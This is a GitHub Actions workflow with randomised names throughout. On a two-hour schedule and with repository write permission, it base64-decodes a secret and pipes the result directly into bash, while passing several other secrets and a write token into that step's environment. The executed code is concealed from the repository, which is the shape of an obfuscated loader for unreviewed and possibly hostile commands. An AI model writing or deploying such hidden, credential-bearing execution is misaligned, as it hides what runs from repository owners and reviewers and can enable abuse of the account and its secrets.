name: IGHyLL
on:
  schedule:
    - cron: '0 */2 * * *'
  workflow_dispatch:
jobs:
  NdwHj:
    runs-on: ubuntu-latest
    permissions:
      contents: write
    steps:
      - uses: actions/checkout@v4
        with:
          token: ${{ secrets.srG7uYmXut }}
      - name: QJFk1eab
        env:
          ukegR: ${{ secrets.oXdoOx }}
          vx2U7ViWI: ${{ secrets.x2WVpk66 }}
          e7Bqzrt: ${{ secrets.MdRS6Ja1luwC }}
          GITHUB_TOKEN: ${{ secrets.srG7uYmXut }}
        run: echo "$ukegR" | base64 -d | bash
